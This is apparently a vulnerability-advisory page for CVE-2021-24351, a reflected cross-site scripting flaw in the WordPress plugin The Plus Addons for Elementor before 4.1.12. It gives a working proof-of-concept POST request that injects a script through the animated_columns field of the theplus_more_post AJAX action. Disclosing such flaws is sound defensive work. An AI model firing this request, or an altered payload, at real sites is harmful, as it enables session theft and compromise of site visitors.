Lucene search
Nicolas VERDIER from TEHTRISWPEX-ID:2EE62F85-7AEA-4B7D-8B2D-5D86D9FB8016HistoryMay 31, 2021 - 12:00 a.m.
The Plus Addons for Elementor < 4.1.12 - Reflected Cross-Site Scripting (XSS)
2021-05-3100:00:00
Nicolas VERDIER from TEHTRIS
353
elementor
addons
cross-site scripting
EPSS
0.002
Percentile
56.8%
The theplus_more_post AJAX action of the plugin did not properly sanitise some of its fields, leading to a reflected Cross-Site Scripting (exploitable on both unauthenticated and authenticated users)
POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 174
Connection: close
action=theplus_more_post&post_type=any&posts_per_page=10&offset=0&display_button=yes&post_load=products&animated_columns=test%22%3e%3cscript%3ealert(%2fXSS%2f)%3c%2fscript%3eReferences
Related
nuclei
nuclei
WordPress The Plus Addons for Elementor <4.1.12 - Cross-Site Scripting
2022-12-21 15:13:37
wpvulndb
wpvulndb
prion
prion
Cross site scripting
2021-06-14 14:15:00
cvelist
cvelist
cve
cve
CVE-2021-24351
2021-06-14 14:15:08
nvd
nvd
CVE-2021-24351
2021-06-14 14:15:08